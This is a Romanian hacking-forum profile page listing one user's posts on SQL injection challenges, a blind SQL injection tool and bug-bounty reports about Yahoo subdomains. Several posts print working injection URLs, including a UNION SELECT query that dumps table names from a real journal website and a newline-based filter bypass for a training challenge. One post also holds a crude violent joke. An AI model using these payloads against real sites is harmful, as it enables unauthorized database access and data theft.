-
Posts
981 -
Joined
-
Last visited
-
Days Won
20
Everything posted by dancezar
-
falicitari esti prost este bug bounty ma anticule bravo sensi poti primi pana la 400-500$ //sper ca l-ai raportat la hackerone
-
http://www.aessweb.com/journal-detail.php?id=5002' and 0 UNION SELECT @c:=0,(select @pula:=group_concat(@c:=@c+1,0x3a,table_name separator '<br>') from information_schema.tables where table_schema=database()),222,4,5,6,@pula,8,9,10,11,12,13,14,15,'danyweb09',17,18+--+ am uitat si eu sa trimit
-
ahahahahha=))))))
-
Challenge closed! Felicitari inca odata celor 4 solveri : Reckon xtremesurfer shello askwrite Desi multi care au incercat sa rezolve challenge-ul s-au aruncat repede la /*!50000 si la urlencode si prostii rezolvarea era foarte simpla si anume %0a care reprezinta caracterul newline si arata cam asa: Pentru numaratul coloanelor se folosete group by la care ii adaugati /*!12345 http://training.hi2.ro/test/lv1.php?id=1%20/*!12345group*/%0Aby%201+--+ si am obtinut 4 coloane cu care am construit injectia union based in felul urmator: http://training.hi2.ro/test/lv1.php?id=1%0Aand%0A0%0Aunion%0Aselect%0A1,2,3,4+--+ Pentru extragerea versiuni se foloseste @@global.version .
-
Te-am trecut pe lista.Sa fim seriosi asta e https://rstforums.com/forum/80988-easy-sql-injection.rst challenge usor. Uite cateva challenge-uri care nu au fost inca inchise https://rstforums.com/forum/76012-hard-sql-injection.rst https://rstforums.com/forum/74593-sqli-challenge.rst https://rstforums.com/forum/75984-easy-sql-injection-challenge.rst https://rstforums.com/forum/76187-strange-sql-injection-challenge.rst Poti considera ca sunt foarte usoare:P
-
Felicitari Reckon .Cine e urmatorul haideti baieti ca e simplu;) mai ales ca Reckon v-a lasat si cateva indicii in poza:))
-
Target:http://training.hi2.ro/test/lv1.php?id=1 Method:Union based Task: -Afisati numele vostru -Scoateti versiunea impreuna cu numele bazei de date Reguli: -Trimiteti sintaxa prin pm si postati un post cu o poza cenzurata Proof: Note:Site-ul si scriptul nu sunt ale mele l-am gasit pe hy. Solvers: -Reckon -xTremeSurfer -Shello -askwrite
-
Faceti si voi ceva mai greu m-am saturat de easy easy easy
-
Bravos ba baiatule!
-
//
-
http://s29.postimg.org/66neq0vgn/sqlieasy.png Hai ca mere oleaca ai pm
-
Url-urile trebuie sa vina sub forma http://site.com fara / dupa de aia nu a mers:)
-
Daca eram tacsu lu ala il legam de calorifer si ii dadeam foc "Hai smechere sa te vad cum te stingi!".
-
scuze Zatarra nu am vazut ca ai postat ,aproape acelasi chestie. //Credis to Zatarra
-
bc=$(printf "%d" "'b") echo $((bc+bc)) codu ascii lu b inmultit cu 2 //cu 2 caractere mai putin b=$(printf "%d" "'b") echo $((b+)
-
https://rstforums.com/forum/79777-bing-dork-extractor.rst Am facut modificari la el si poate scoate si dorkuri de pe google numai ca te blocheaza dupa 50 de pagini,partea buna e ca daca mai stai 30 de minute calm sau te bagi printr-un vpn poti continua sa scanezi
-
Este gen arduino daca stii numai ca ai posibilitatea de a rula linux pe el,poti sa faci tot ce vrei pe el ca la un pc numai ca este mai micut.La el poti sa ii adaugi extensii pentru a face proiecte de electronica. Raspberry Pi - Wikipedia, the free encyclopedia
-
Da pai scrii tu acolo ce vrei sa extragi nu este pus in cuie @@version poti scoate si selectii. Tocmai de asta l-am facut:).Sa presupunem ca ai un site mai incet ,la unele tooluri nu poti extrage ce vrei tu fara ca inainte sa extraga numele bazei de date apoi tabele blbaabala si daca nu le extrage corect s-o futut totu si asta m-a disperat.
-
Scopul acestui programel este sa faca Blind Based sql injection. Cerinte minime: -Windows xp (testat pe windows 7) -Winsock.ocx Caracteristici: -Pentru fiecare litera de ghicit se foloseste cate un socket separat -Ca default ghiceste fiecare litera folosind codul ascii al fiecarui caracter cuprins intre 32 si 122 -Se poate defini un dictionar de catre utilizator bifind acea casuta -Se pot scoate variabile gen @@version, database() etc... sau selectii sub forma aceasta (select table_name from information_schema.tables where table_schema=database() limit 0,1) Casuta keyword se completeaza cu un cuvant care apare in sursa daca injectia este TRUE si dispare in momentul cand injectia este FALSE mai exact cuvantul cheie este un cuvant care face diferenta intre o injectie true sau false. Screenshot: Programul este aici: <sarcasm>Nu postez scan report de pe virus total ca sa va infectez pe toti muhahah</sarcasm> Sursa scrisa in anticul VB6: Zippyshare.com - blind.rar Si un demo frate: Pe viitor am sa aduc urmatoarele inbunatatiri: -Am sa adaug POST injection -Am sa mai imbunatatesc protocolul HTTP la unele da bad request -Injectiile vor veni cu WAF bypass ca default spatiile %20 vor fi inlocuite cu %0a -Inject_here option -Am sa incerc sa fac un prototip de timebased injection Pentru buguri contactati-ma pe PM. -Reparat bugul cu sursa de sub 8000 de caractere
-
Frumoasa prezentare apreciez faptul ca ai scris atat. Bun venit!
-
Just challenging propose. Nu pot sa cred ca ,locatia indicata de tine nu este vurnerabila;) Nu mai critica pe alti vezi-ti barna din ochiul tau! Cica spor la vunrerabilitate:|
-
Yahoo.net Full Path Discloure + XSS + Posible Sql injection
dancezar replied to dancezar's topic in Bug Bounty
Nu sunt in scope pentru bani dar am raportat un fpd intr-un .net si am primit HOF //se ofera bani doar pentru vurnerabilitati grave in .net -
Yahoo.net Full Path Discloure + XSS + Posible Sql injection
dancezar replied to dancezar's topic in Bug Bounty
Da toate is in .net //Is domenii care le apartin -
Target: .yahoo.net Exploit #1 Full path discloure: http://s21.postimg.org/op7ug87tj/fpd.png Exploit #2 Cross site scripting POST http://s30.postimg.org/6qj3jcahc/yahoo.jpg Exploit #3 Sql injection (True and false) True:View image: true False:http://s15.postimg.org/trvc34vwb/false.png Toate in acelasi subdomeniu.Ps: daca cautati putin s-ar putea sa il gasiti --Vurnerabilitati Raportate
-
In concluzie sunt foarte depasiti de situatie. Am un xss persistent raportat in septembrie dar nici acuma nu au reparat ci doar au blocat intrarile din baza de date.Am mai raportat si un FPD care l-au reparat repede si m-au recut pe HOF dar reward nu pentru ca era in .net . Trebuie sa ai putina rabdare atat. Defapt putin mai mult:))